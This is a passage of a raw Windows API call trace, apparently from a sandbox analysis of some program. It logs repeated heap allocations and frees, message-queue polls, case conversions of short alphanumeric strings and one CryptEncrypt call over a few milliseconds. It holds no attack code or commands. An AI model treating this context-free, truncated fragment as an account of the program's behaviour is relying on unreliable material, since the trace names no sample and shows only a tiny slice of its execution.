lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0190.866] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0190.866] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0190.866] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0190.866] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0190.866] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0190.866] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0190.866] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0190.866] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0190.867] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.867] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.867] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0190.867] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0190.867] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0190.867] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0190.867] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0190.867] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0190.867] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0190.867] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0190.867] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0190.867] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0190.867] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0190.868] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0190.868] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0190.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0190.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0190.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0190.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0190.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0190.868] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0190.868] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0190.868] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0190.868] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0190.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0190.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0190.868] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.868] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0190.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0190.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0190.868] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0190.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0190.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0190.869] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0190.869] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0190.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0190.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0190.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0190.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0190.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0190.869] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0190.869] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.869] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0190.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0190.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0190.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0190.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0190.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0190.869] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.869] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0190.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0190.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0190.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0190.870] CryptEncrypt (in: hKey=0xaa5860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x8) returned 1 [0190.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0190.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0190.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01e0 [0190.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0190.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0190.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0190.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01c0 [0190.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0190.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01c0 | out: hHeap=0x25c0000) returned 1 [0190.870] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0190.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0190.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0190.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0190.870] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01c0 [0190.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0190.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01c0 | out: hHeap=0x25c0000) returned 1 [0190.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0190.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0190.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0190.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0190.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01c0 [0190.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0190.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01c0 | out: hHeap=0x25c0000) returned 1 [0190.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0190.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0190.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0190.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0190.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01c0 [0190.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0190.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01c0 | out: hHeap=0x25c0000) returned 1 [0190.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0190.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0190.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0190.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0190.871] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01c0 [0190.871] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0190.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01c0 | out: hHeap=0x25c0000) returned 1 [0190.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0190.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0190.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0190.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0190.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01c0 [0190.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0190.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01c0 | out: hHeap=0x25c0000) returned 1 [0190.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0190.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0190.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0190.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0190.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01c0 [0190.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0190.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01c0 | out: hHeap=0x25c0000) returned 1 [0190.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0190.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0190.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0190.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0190.872] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01c0 [0190.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0190.872] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01c0 | out: hHeap=0x25c0000) returned 1 [0190.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0190.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0190.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0190.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0190.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0190.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0190.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0190.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0190.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0190.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0190.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0190.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0190.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0190.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0190.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0190.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0190.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0190.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0190.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0190.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0190.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0190.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0190.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0190.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0190.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0190.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0190.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0190.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0190.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0190.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0190.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0190.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0190.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0190.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0190.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0190.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0190.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0190.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f1fe0 | out: hHeap=0x25c0000) returned 1 [0190.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0190.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0190.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0190.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0190.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0190.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0190.874] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0190.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0190.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0190.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0190.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0190.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0190.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0190.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0190.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0190.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0190.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0190.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0190.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0190.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0190.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0190.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0190.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0190.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0190.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0190.876] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0190.876] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0190.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0190.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0190.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0190.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0190.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0190.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0190.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0190.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0190.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0190.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0190.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0190.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0190.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0190.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0190.876] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0190.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0190.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0190.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0190.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0190.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0190.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0190.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0190.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0190.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0190.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0190.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0190.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0190.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0190.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0190.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0190.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0190.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0190.877] HeapFree (in: 